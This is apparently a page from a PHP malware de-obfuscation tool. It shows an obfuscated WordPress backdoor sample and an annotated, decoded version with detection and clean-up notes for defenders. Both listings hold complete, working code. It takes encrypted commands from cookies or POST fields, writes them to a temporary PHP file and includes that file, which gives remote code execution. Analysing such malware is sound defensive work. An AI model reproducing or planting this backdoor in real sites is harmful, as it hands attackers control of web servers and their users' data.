De-obfuscate PHP malware/viruses and tampering code found on WordPress sites back into readable code.
*Please note that not all obfuscation codes can be decoded.<?php
// Raw obfuscated sample, kept exactly as submitted (analyst comments added only).
// Obfuscation layers visible in this line:
//   1. sd1() rebuilds every string one character at a time by indexing into an
//      alphabet that is itself split into concatenated literal fragments.
//   2. The rebuilt strings are stored in $mc6 and invoked as variable functions
//      ($mc6[n](...)), so no sensitive function name appears in plain text.
//   3. Calls are prefixed with @, which suppresses warnings.
// Behaviour once decoded: values taken from $_COOKIE and $_POST are decoded,
// written to a PHP file, and that file is passed to include. Treat any file
// containing this code as a remote code execution backdoor, not as a damaged
// legitimate file.
function sd1($dh2){$vt3 = "lo-uy8x2in9msI" ."163h(#k_)E" ."/Lve?F;gc* 'drH7@.p4t" ."a50" ."f<" ."b" ;$tt5='';foreach($dh2 as $yx4){$tt5.=$vt3[$yx4];}return $tt5;}$mc6 = Array();$mc6[] = sd1(Array(16,39,15,43,46,48,50,43,2,47,7,39,45,2,43,39,47,48,2,5,32,15,27,2,32,27,5,47,7,10,27,36,27,15,14,7));$mc6[] = sd1(Array(28,42,17,42,34,40,3,9,0,8,9,20,18,21,21,29,13,25,23,21,21,22,30,34));$mc6[] = sd1(Array(41,11,1,36,3,0,27));$mc6[] = sd1(Array(38,33));$mc6[] = sd1(Array(41,24));$mc6[] = sd1(Array(19));$mc6[] = sd1(Array(49));$mc6[] = sd1(Array(48,8,0,27,21,42,3,44,21,32,1,9,44,27,9,44,12));$mc6[] = sd1(Array(45,37,37,45,4,21,11,27,37,31,27));$mc6[] = sd1(Array(12,44,37,21,37,27,42,27,45,44));$mc6[] = sd1(Array(27,6,42,0,1,36,27));$mc6[] = sd1(Array(12,3,50,12,44,37));$mc6[] = sd1(Array(3,9,0,8,9,20));$mc6[] = sd1(Array(12,44,37,0,27,9));$mc6[] = sd1(Array(42,45,32,20));$mc6[] = sd1(Array(11,36,46));foreach ($mc6[8]($_COOKIE, $_POST) as $wa14 => $dd11){function pa8($mc6, $wa14, $bt10){return $mc6[11]($mc6[9]($wa14 . $mc6[0], ($bt10 / $mc6[13]($wa14)) + 1), 0, $bt10);}function oj7($mc6, $ec12){return @$mc6[14]($mc6[3], $ec12);}function hk9($mc6, $ec12){if (isset($ec12[2])) {$sq13 = $mc6[4] . $mc6[15]($mc6[0]) . $mc6[2];@$mc6[7]($sq13, $mc6[6] . $mc6[1] . $ec12[1]($ec12[2]));@include($sq13);@$mc6[12]($sq13);exit();}}$dd11 = oj7($mc6, $dd11);hk9($mc6, $mc6[10]($mc6[5], $dd11 ^ pa8($mc6, $wa14, $mc6[13]($dd11))));}
<?php
/*
 * Analyst notes, added as comments only; the sample's tokens are unchanged.
 *
 * This listing is the pretty-printed form of the obfuscated sample. The
 * formatter did not resolve the string table, so the decoded values are given
 * in the comments next to each entry below.
 *
 * Behaviour, read from the code:
 *   - sd1() rebuilds strings by indexing into a single alphabet string.
 *   - $mc6 holds 16 rebuilt strings: an embedded UUID, PHP function names and
 *     short fragments. Functions are then invoked as $mc6[n](...), so names
 *     such as file_put_contents never appear literally in the file.
 *   - The loop walks every cookie and POST field. Each value is hex-decoded,
 *     XORed with a keystream built from the field name plus the UUID, and
 *     split on '#'. When the result has an element at index 2, element 1 is
 *     called as a function on element 2, the return value is written to a PHP
 *     file, that file is included and deleted, and the request ends.
 *   Net effect: request-controlled data reaches include, i.e. this is a remote
 *   code execution backdoor.
 *
 * Detection and clean-up pointers for defenders:
 *   - Static: an integer-indexed string builder feeding an array that is then
 *     called as functions, function declarations nested inside a foreach, and
 *     an @-suppressed include of a variable path.
 *   - Runtime: a short-lived file named ./<md5 of the embedded UUID>.module
 *     created in the script's working directory; file-integrity or audit
 *     logging on the web root will see the create/delete pair even though the
 *     file does not persist.
 *   - Deleting this snippet alone is not sufficient: its presence means
 *     something was able to write PHP into the site. Compare files against
 *     known-good copies, look for further implants, and rotate credentials.
 */
function sd1($dh2) {
    // Lookup alphabet: every integer in $dh2 selects one character from it.
    $vt3 = "lo-uy8x2in9msI163h(#k_)E/Lve?F;gc* 'drH7@.p4ta50f<b";
    $tt5 = '';
    foreach ($dh2 as $yx4) {
        $tt5 .= $vt3[$yx4];
    }
    return $tt5;
}

// String table. The value each sd1() call produces is shown on the line above it.
$mc6 = array();
// [0]  "37645fb4-027a-470f-8c6e-ce8029ede612"  (UUID; used as XOR key material and to name the dropped file)
$mc6[] = sd1(array(16, 39, 15, 43, 46, 48, 50, 43, 2, 47, 7, 39, 45, 2, 43, 39, 47, 48, 2, 5, 32, 15, 27, 2, 32, 27, 5, 47, 7, 10, 27, 36, 27, 15, 14, 7));
// [1]  "?php @unlink(__FILE__); "  (prefix of the dropped file; the dropped file also deletes itself)
$mc6[] = sd1(array(28, 42, 17, 42, 34, 40, 3, 9, 0, 8, 9, 20, 18, 21, 21, 29, 13, 25, 23, 21, 21, 22, 30, 34));
// [2]  ".module"
$mc6[] = sd1(array(41, 11, 1, 36, 3, 0, 27));
// [3]  "H*"  (pack format: hex string, high nibble first)
$mc6[] = sd1(array(38, 33));
// [4]  "./"
$mc6[] = sd1(array(41, 24));
// [5]  "#"  (field separator of the decoded command)
$mc6[] = sd1(array(19));
// [6]  "<"  (kept apart from [1] so the PHP open tag never appears as one literal)
$mc6[] = sd1(array(49));
// [7]  "file_put_contents"
$mc6[] = sd1(array(48, 8, 0, 27, 21, 42, 3, 44, 21, 32, 1, 9, 44, 27, 9, 44, 12));
// [8]  "array_merge"
$mc6[] = sd1(array(45, 37, 37, 45, 4, 21, 11, 27, 37, 31, 27));
// [9]  "str_repeat"
$mc6[] = sd1(array(12, 44, 37, 21, 37, 27, 42, 27, 45, 44));
// [10] "explode"
$mc6[] = sd1(array(27, 6, 42, 0, 1, 36, 27));
// [11] "substr"
$mc6[] = sd1(array(12, 3, 50, 12, 44, 37));
// [12] "unlink"
$mc6[] = sd1(array(3, 9, 0, 8, 9, 20));
// [13] "strlen"
$mc6[] = sd1(array(12, 44, 37, 0, 27, 9));
// [14] "pack"
$mc6[] = sd1(array(42, 45, 32, 20));
// [15] "md5"
$mc6[] = sd1(array(11, 36, 46));

// array_merge($_COOKIE, $_POST): every cookie and every POST field is tried in
// turn; $wa14 is the field name, $dd11 its value.
foreach ($mc6[8]($_COOKIE, $_POST) as $wa14 => $dd11) {
    // NOTE(review): these three functions are declared inside the loop body, so
    // a second iteration would presumably hit a "cannot redeclare" fatal error.
    // If confirmed, such errors in the PHP log are a further indicator.

    // Keystream: substr(str_repeat($wa14 . UUID, $bt10 / strlen($wa14) + 1), 0, $bt10),
    // i.e. field name plus UUID, repeated and cut to $bt10 bytes.
    function pa8($mc6, $wa14, $bt10) {
        return $mc6[11]($mc6[9]($wa14 . $mc6[0], $bt10 / $mc6[13]($wa14) + 1), 0, $bt10);
    }

    // pack("H*", $ec12): turns a hex string into raw bytes; @ hides warnings.
    function oj7($mc6, $ec12) {
        return @$mc6[14]($mc6[3], $ec12);
    }

    // Acts only when the decoded, '#'-split command has an element at index 2.
    function hk9($mc6, $ec12) {
        if (isset($ec12[2])) {
            // Drop path: "./" . md5(UUID) . ".module"
            $sq13 = $mc6[4] . $mc6[15]($mc6[0]) . $mc6[2];
            // file_put_contents(path, "<" . "?php @unlink(__FILE__); " . f(arg)),
            // where f is $ec12[1] and arg is $ec12[2], both taken from the request.
            @$mc6[7]($sq13, $mc6[6] . $mc6[1] . $ec12[1]($ec12[2]));
            // The written file is executed here.
            @(include $sq13);
            // unlink(path): removes the dropped file so nothing persists on disk.
            @$mc6[12]($sq13);
            // Ends the request; nothing after this point in the host script runs.
            exit;
        }
    }

    // Hex-decode the field value.
    $dd11 = oj7($mc6, $dd11);
    // XOR the decoded bytes with the keystream, explode("#", ...), then hand
    // the resulting array to hk9().
    hk9($mc6, $mc6[10]($mc6[5], $dd11 ^ pa8($mc6, $wa14, $mc6[13]($dd11))));
}